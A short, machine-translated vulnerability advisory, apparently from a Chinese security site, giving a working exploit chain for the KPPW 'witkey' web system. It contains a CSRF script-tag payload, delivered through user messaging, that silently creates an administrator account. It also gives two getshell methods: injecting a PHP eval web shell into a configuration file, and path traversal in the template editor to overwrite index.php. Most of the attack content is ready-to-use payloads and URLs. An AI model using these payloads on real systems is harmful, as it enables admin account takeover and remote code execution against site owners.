Passenger passenger witkey system CSRF+getshell-a vulnerability warning-the black bar safety net

2013-05-06T00:00:00
ID MYHACK58:62201338632
Type myhack58
Reporter take
Modified 2013-05-06T00:00:00

Description

  1. Registered members

2, The

http://127.0.0.1/index.php?do=user&view=message&msg_type=write

3, is sent to the admin, the following is a csrf, the purpose is to add an administrator account kppw password kppwkppw

<script src=http://127.0.0.1/control/admin/index. php? do=user&view=add&edituid=&fds%5Busername%5D=kppw&fds%5Bpassword

%5D=kppwkppw&fds%5Bemail%5D=kppw%40kppw. com&fds%5Bgroup_id%5D=1&is_submit=1 ></script>

4, The getshell method of the two

(1)gpc off in the global configuration members to integrate UCENTER coding modifications to');eval($_POST[a])?& gt;;

连接 http://127.0.0.1/config/config_ucenter.php

(2)

http://127.0.0.1/control/admin/index.php?do=tpl&view=edit_tpl&tplname=default&tname=../../index.php